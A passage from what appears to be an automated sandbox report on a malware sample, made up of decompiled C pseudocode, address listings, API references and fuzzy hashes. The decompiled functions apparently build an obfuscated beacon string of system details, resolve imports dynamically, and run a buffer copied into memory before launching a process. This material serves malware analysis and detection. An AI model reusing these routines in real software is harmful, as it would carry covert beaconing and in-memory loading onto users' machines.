					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                          0x0677a872
                                          0x0677a87f
                                          0x0677a880
                                          0x0677a881
                                          0x0677a888
                                          0x0677a8b6
                                          0x0677a8b7
                                          0x0677a8ba
                                          0x0677a8c0
                                          0x00000000
                                          0x00000000
                                          0x0677a89f
                                          0x0677a8a9
                                          0x0677a8b0
                                          0x00000000
                                          0x0677a8a1
                                          0x0677a8a4
                                          0x0677a8c4
                                          0x0677a8a6
                                          0x0677a8a6
                                          0x00000000
                                          0x0677a8a6
                                          0x0677a8a4
                                          0x0677a8cb
                                          0x0677a8d1
                                          0x0677a8d1
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9c61467b43d674fcb90463aaebcffe5d20822c4c36811cc6fa018bb1371f3464
                                          • Instruction ID: 9636c85d585f2e416f78e5b9f602b28d324b2ef5e30e56cd3501d0b5c0025fa4
                                          • Opcode Fuzzy Hash: 9c61467b43d674fcb90463aaebcffe5d20822c4c36811cc6fa018bb1371f3464
                                          • Instruction Fuzzy Hash: F6F0E775D11258EFEF02DB94C988AFDB7B8EF09344F1484AAE502A3240D7B46B85CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0677514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E0677514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x677d018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x677d014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x677d010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x677d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x677d2a4; // 0x4ca5a8
				_t3 = _t31 + 0x677e633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x677d02c,  *0x677d004, _t26);
				_t34 = E067757AB();
				_t35 =  *0x677d2a4; // 0x4ca5a8
				_t4 = _t35 + 0x677e673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E067773E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x677d2a4; // 0x4ca5a8
					_t6 = _t86 + 0x677e8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x677d238, 0, _t99);
				}
				_t100 = E0677614A();
				if(_t100 != 0) {
					_t81 =  *0x677d2a4; // 0x4ca5a8
					_t8 = _t81 + 0x677e8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x677d238, 0, _t100);
				}
				_t101 =  *0x677d324; // 0x6c495b0
				_a32 = E0677757B(0x677d00a, _t101 + 4);
				_t43 =  *0x677d2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x677d2a4; // 0x4ca5a8
					_t11 = _t77 + 0x677e8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x677d2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x677d2a4; // 0x4ca5a8
					_t13 = _t74 + 0x677e8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x677d238, 0, 0x800);
					if(_t103 != 0) {
						E0677749F(GetTickCount());
						_t51 =  *0x677d324; // 0x6c495b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x677d324; // 0x6c495b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x677d324; // 0x6c495b0
						_t106 = E06774D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x677c294);
							_t63 =  *0x677d2a4; // 0x4ca5a8
							_push(_t106);
							_t15 = _t63 + 0x677e252; // 0x616d692f
							_t65 = E06779DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E0677666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E06776106();
								}
								HeapFree( *0x677d238, 0, _v48);
							}
							HeapFree( *0x677d238, 0, _t106);
						}
						HeapFree( *0x677d238, 0, _t103);
					}
					HeapFree( *0x677d238, 0, _a24);
				}
				HeapFree( *0x677d238, 0, _t108);
				return _a12;
			}

















































                                          0x0677514f
                                          0x0677514f
                                          0x0677514f
                                          0x06775154
                                          0x0677515a
                                          0x06775164
                                          0x06775166
                                          0x06775166
                                          0x06775173
                                          0x0677517e
                                          0x06775181
                                          0x0677518c
                                          0x0677518f
                                          0x06775194
                                          0x06775197
                                          0x0677519c
                                          0x0677519f
                                          0x067751ab
                                          0x067751b8
                                          0x067751ba
                                          0x067751c0
                                          0x067751c5
                                          0x067751d0
                                          0x067751d2
                                          0x067751d5
                                          0x067751dc
                                          0x067751e0
                                          0x067751e2
                                          0x067751e7
                                          0x067751f3
                                          0x067751f5
                                          0x06775201
                                          0x06775203
                                          0x06775203
                                          0x0677520e
                                          0x06775212
                                          0x06775214
                                          0x06775219
                                          0x06775225
                                          0x06775227
                                          0x06775233
                                          0x06775235
                                          0x06775235
                                          0x0677523b
                                          0x0677524e
                                          0x06775252
                                          0x06775259
                                          0x0677525c
                                          0x06775261
                                          0x0677526c
                                          0x0677526e
                                          0x06775271
                                          0x06775271
                                          0x06775273
                                          0x0677527a
                                          0x0677527d
                                          0x06775282
                                          0x0677528c
                                          0x0677528e
                                          0x06775296
                                          0x067752af
                                          0x067752b3
                                          0x067752bf
                                          0x067752c4
                                          0x067752cd
                                          0x067752de
                                          0x067752e2
                                          0x067752eb
                                          0x067752f1
                                          0x067752fe
                                          0x0677530b
                                          0x06775311
                                          0x0677531d
                                          0x06775323
                                          0x06775328
                                          0x06775329
                                          0x06775330
                                          0x06775335
                                          0x0677533b
                                          0x06775341
                                          0x06775348
                                          0x0677534f
                                          0x06775355
                                          0x0677535c
                                          0x06775360
                                          0x0677536b
                                          0x06775370
                                          0x06775376
                                          0x0677537f
                                          0x0677537f
                                          0x06775390
                                          0x06775390
                                          0x0677539f
                                          0x0677539f
                                          0x067753ae
                                          0x067753ae
                                          0x067753c0
                                          0x067753c0
                                          0x067753cf
                                          0x067753e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 06775166
                                          • wsprintfA.USER32 ref: 067751B3
                                          • wsprintfA.USER32 ref: 067751D0
                                          • wsprintfA.USER32 ref: 067751F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06775203
                                          • wsprintfA.USER32 ref: 06775225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06775235
                                          • wsprintfA.USER32 ref: 0677526C
                                          • wsprintfA.USER32 ref: 0677528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 067752A9
                                          • GetTickCount.KERNEL32 ref: 067752B9
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 067752CD
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 067752EB
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,067752FE,?,06C495B0), ref: 06774D57
                                            • Part of subcall function 06774D2C: lstrlen.KERNEL32(?,?,?,067752FE,?,06C495B0), ref: 06774D5F
                                            • Part of subcall function 06774D2C: strcpy.NTDLL ref: 06774D76
                                            • Part of subcall function 06774D2C: lstrcat.KERNEL32(00000000,?), ref: 06774D81
                                            • Part of subcall function 06774D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,067752FE,?,06C495B0), ref: 06774D9E
                                          • StrTrimA.SHLWAPI(00000000,0677C294,?,06C495B0), ref: 0677531D
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?,00000000,00000000,06775335,616D692F,00000000), ref: 06779DFB
                                            • Part of subcall function 06779DEF: lstrlen.KERNEL32(?), ref: 06779E03
                                            • Part of subcall function 06779DEF: lstrcpy.KERNEL32(00000000,?), ref: 06779E1A
                                            • Part of subcall function 06779DEF: lstrcat.KERNEL32(00000000,?), ref: 06779E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 06775348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0677534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 0677535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 06775360
                                            • Part of subcall function 0677666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 06776720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 06775390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0677539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,06C495B0), ref: 067753AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 067753C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 067753CF
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 6fbf75d0a360a667d997ce71d353f4d7cc1c76957c648bc8fef55ee3c29c1758
                                          • Instruction ID: 5a5e42453cffa3af4381f8ac434f7f8fdb70c414f39547d180184c0dc9d4ae88
                                          • Opcode Fuzzy Hash: 6fbf75d0a360a667d997ce71d353f4d7cc1c76957c648bc8fef55ee3c29c1758
                                          • Instruction Fuzzy Hash: 3661E371900201AFDB61DF64EC48F6A77EAEF48314F054524FB08DB254EB35E906DBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677ADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E0677ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x6770000;
				_t115 = _t139[3] + 0x6770000;
				_t131 = _t139[4] + 0x6770000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x6770000;
				_v16 = _t139[5] + 0x6770000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x6770002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x677d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x677d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x677d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x677d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x677d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x677d198; // 0x0
										 *_t102 = _t125;
										 *0x677d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x677d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x0677adb4
                                          0x0677adca
                                          0x0677add0
                                          0x0677add2
                                          0x0677add7
                                          0x0677addd
                                          0x0677ade2
                                          0x0677ade5
                                          0x0677adf3
                                          0x0677adfa
                                          0x0677adfd
                                          0x0677ae00
                                          0x0677ae01
                                          0x0677ae04
                                          0x0677ae07
                                          0x0677ae0a
                                          0x0677ae0f
                                          0x0677ae1e
                                          0x00000000
                                          0x0677ae24
                                          0x0677ae2e
                                          0x0677ae38
                                          0x0677ae3d
                                          0x0677ae3f
                                          0x0677ae49
                                          0x0677ae4c
                                          0x0677ae4f
                                          0x0677ae55
                                          0x0677ae57
                                          0x0677ae57
                                          0x0677ae5a
                                          0x0677ae5d
                                          0x0677ae62
                                          0x0677ae66
                                          0x0677ae79
                                          0x0677ae7b
                                          0x0677af23
                                          0x0677af23
                                          0x0677af2a
                                          0x0677af2d
                                          0x0677af37
                                          0x0677af37
                                          0x0677af3b
                                          0x0677afb9
                                          0x0677afbc
                                          0x0677afbe
                                          0x0677afbe
                                          0x0677afc5
                                          0x0677afc7
                                          0x0677afd1
                                          0x0677afd4
                                          0x0677afd7
                                          0x0677afd7
                                          0x00000000
                                          0x0677af3d
                                          0x0677af40
                                          0x0677af6e
                                          0x0677af78
                                          0x0677af7c
                                          0x0677af84
                                          0x0677af87
                                          0x0677af8e
                                          0x0677af98
                                          0x0677af98
                                          0x0677af9c
                                          0x0677afa1
                                          0x0677afb0
                                          0x0677afb6
                                          0x0677afb6
                                          0x0677af9c
                                          0x00000000
                                          0x0677af47
                                          0x0677af4a
                                          0x0677af52
                                          0x0677af67
                                          0x0677af6c
                                          0x00000000
                                          0x00000000
                                          0x0677af6c
                                          0x00000000
                                          0x0677af52
                                          0x0677af40
                                          0x0677af3b
                                          0x0677ae81
                                          0x0677ae88
                                          0x0677ae98
                                          0x0677aea1
                                          0x0677aea5
                                          0x0677aee8
                                          0x0677aef4
                                          0x0677af1d
                                          0x0677aef6
                                          0x0677aefa
                                          0x0677af00
                                          0x0677af08
                                          0x0677af0a
                                          0x0677af0d
                                          0x0677af13
                                          0x0677af15
                                          0x0677af15
                                          0x0677af08
                                          0x0677aefa
                                          0x00000000
                                          0x0677aef4
                                          0x0677aead
                                          0x0677aeb0
                                          0x0677aeb7
                                          0x0677aec7
                                          0x0677aeca
                                          0x0677aeda
                                          0x00000000
                                          0x0677aee0
                                          0x0677aec1
                                          0x0677aec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677aec5
                                          0x0677ae92
                                          0x0677ae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0677ae96
                                          0x0677ae6f
                                          0x0677ae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0677AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 0677AE9B
                                          • GetLastError.KERNEL32 ref: 0677AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0677AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: b6d52a515baccd2c94fc6548322323a7a538bb8bc68b4b5b65e513e6d2e298c8
                                          • Instruction ID: 7716d0ca2a0fc533f83a57c9ea405b29adfc54a56f296c5928cb897f44daf718
                                          • Opcode Fuzzy Hash: b6d52a515baccd2c94fc6548322323a7a538bb8bc68b4b5b65e513e6d2e298c8
                                          • Instruction Fuzzy Hash: 7C8109B1A10209AFEF65CFA9D885AADB7F6FF48310F158129EA05E7240E770E945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067730FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E067730FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x677d33c; // 0x6c49bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E06779810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x677c19c;
				}
				_t44 = E067747E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E067758BE(lstrlenW(0x677eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x677eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x677d2a4; // 0x4ca5a8
						_t73 =  *0x677d11c; // 0x677abc9
						_t18 = _t75 + 0x677eb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E067758BE(lstrlenW(0x677ec58) + _a8 + _t57 + _t58 + lstrlenW(0x677ec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E0677147E(_v16);
						} else {
							_t64 =  *0x677d2a4; // 0x4ca5a8
							_t31 = _t64 + 0x677ec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E0677147E(_v8);
				}
				return _v20;
			}


























                                          0x067730fc
                                          0x06773104
                                          0x0677310a
                                          0x0677311a
                                          0x0677311d
                                          0x06773122
                                          0x06773127
                                          0x06773129
                                          0x06773129
                                          0x06773132
                                          0x06773137
                                          0x0677313c
                                          0x06773142
                                          0x0677314c
                                          0x06773155
                                          0x0677315c
                                          0x0677316a
                                          0x0677317c
                                          0x06773181
                                          0x06773186
                                          0x0677318f
                                          0x06773198
                                          0x067731a1
                                          0x067731af
                                          0x067731b7
                                          0x067731bc
                                          0x067731bf
                                          0x067731ca
                                          0x067731e1
                                          0x067731e5
                                          0x06773218
                                          0x067731e7
                                          0x067731ea
                                          0x067731f2
                                          0x067731fd
                                          0x06773205
                                          0x0677320d
                                          0x06773211
                                          0x06773211
                                          0x067731e5
                                          0x06773220
                                          0x06773225
                                          0x0677322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 06773111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0677314C
                                          • lstrlen.KERNEL32(?), ref: 06773155
                                          • lstrlen.KERNEL32(00000000), ref: 0677315C
                                          • lstrlenW.KERNEL32(80000002), ref: 0677316A
                                          • lstrlenW.KERNEL32(0677EB38), ref: 06773173
                                          • lstrlen.KERNEL32(?), ref: 067731B7
                                          • lstrlen.KERNEL32(?), ref: 067731BF
                                          • lstrlenW.KERNEL32(?), ref: 067731CA
                                          • lstrlenW.KERNEL32(0677EC58), ref: 067731D3
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: fef1c14de750f7cf90df1dd2aad9fc0476d85366f291d5234ee14939cf98ce38
                                          • Instruction ID: 923a2c19f6d25e1be012131d4c199e9190986683ca494771ba7c4f1ffb34d82c
                                          • Opcode Fuzzy Hash: fef1c14de750f7cf90df1dd2aad9fc0476d85366f291d5234ee14939cf98ce38
                                          • Instruction Fuzzy Hash: 2D313B76D00219EFCF11AFA4CC44C9E7FB6EF48254B158495EA14A7211DB35DA11EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06771493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E06771493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E067757D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x677d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x677d2a4; // 0x4ca5a8
					_t18 = _t46 + 0x677e3e6; // 0x73797325
					_t66 = E067777E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x677d2a4; // 0x4ca5a8
						_t19 = _t49 + 0x677e747; // 0x6c48cef
						_t20 = _t49 + 0x677e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0677684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0677684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x677d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E0677147E(_t68);
				goto L12;
			}



















                                          0x0677149b
                                          0x0677149b
                                          0x067714aa
                                          0x067714b1
                                          0x067714b6
                                          0x067715c6
                                          0x067715cd
                                          0x067715cd
                                          0x067714c5
                                          0x067714d0
                                          0x067714d3
                                          0x067714d8
                                          0x067714ed
                                          0x067714f3
                                          0x067714f4
                                          0x067714f7
                                          0x067714fd
                                          0x06771500
                                          0x06771505
                                          0x0677150d
                                          0x06771519
                                          0x0677151d
                                          0x067715ad
                                          0x06771523
                                          0x06771523
                                          0x06771528
                                          0x0677152f
                                          0x06771543
                                          0x06771547
                                          0x06771596
                                          0x06771549
                                          0x0677154a
                                          0x06771551
                                          0x0677156a
                                          0x0677156c
                                          0x06771570
                                          0x06771577
                                          0x06771591
                                          0x06771579
                                          0x06771582
                                          0x06771587
                                          0x06771587
                                          0x06771577
                                          0x067715a5
                                          0x067715a5
                                          0x0677151d
                                          0x067715b4
                                          0x067715bd
                                          0x067715c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 067757D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,067714AF,?,?,?,?,00000000,00000000), ref: 067757FD
